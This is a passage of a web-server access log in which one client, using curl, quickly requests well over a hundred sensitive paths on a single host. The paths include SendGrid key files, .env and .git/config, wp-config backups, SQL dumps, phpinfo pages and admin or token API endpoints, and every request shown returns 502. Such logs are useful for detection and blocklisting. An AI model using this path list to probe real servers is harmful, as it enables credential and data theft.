terminal.profibot.hu "/wp-content/themes/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/wp-mail-smtp/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-includes/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-admin/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/.sendgrid/credentials" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/.sendgrid/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid_config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid_keys" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid_config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid_keys" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid_config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid_keys" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid_config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.py" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/settings/sendgrid_keys" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/settings/sendgrid_config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings/sendgrid_config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/env/sendgrid.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/env/sendgrid_keys.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/instance/sendgrid_keys.py" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.py" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/keys/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/api_keys/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/packages/sendgrid.yaml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets/prod/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets/dev/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/storage/sendgrid.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.orig" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.phtml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/%c0/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/configs/application.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/empty/search/results" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/service" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/system/info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/gateway" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/command" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/user" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/user/password" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/user/status" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/auth" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/role" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin/role/id" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/admin" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/sms-sender" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/contact/manager" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/privilege-api/forwarder" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/privilege-api/forwarder/event" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/open-api" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/upload" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/savefile" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/files" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/files.remote.share" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/netdisk/download" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/sources/api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/app/api/bzycs.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/src/api/config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:12 +0000] - - 502 - GET https terminal.profibot.hu "/web/api/config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/.git/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/finchat/open-api/auth/token" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/account/oauth/token" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/account/oauth/ticket" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/tokens" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/login" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/auth" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/authentication" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/auth/v1/pin/verify" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/register" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/resetpassword" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/info/refs" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/info/exclude" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/objects/info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/drupal/coder/.git/objects/info/packs" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/info.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/info.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/member/space/company/info.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/cmsmessages/information.aspx" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/cmsmessages/information.aspx.cs" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/module/info/include/mysql/phpcms_info.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.dev" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.test" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-prod" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-preprod" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.staging" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.stg" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-server" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-server.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo.srv" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo-api" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfoapi" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo_details.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo_details" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfomolten.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfodev" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:13 +0000] - - 502 - GET https terminal.profibot.hu "/shop/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/bitrix/admin/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/mambo/administrator/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/lib/zend/tool/framework/system/provider/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/phpinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/.git/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/blog/wp-content/themes/.git/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/themes/.git/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/.git/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/db.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/mysql.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/dump.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/db.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/mysql.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/db.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/db.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/db_backup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/db_backup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/db_backup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/fullbackup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/fullwebsite.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/data.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/data.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/data.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/data.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/database.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/database.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/wordpress.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/wordpress.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/dbdump.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/dbdump.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backups/dbdump.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/dbdump.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config-sample.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.bak1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.bak1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/config.inc.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:14 +0000] - - 502 - GET https terminal.profibot.hu "/connect.php.bak" [Client 185.177.72.56] [Length 154] [Gzip 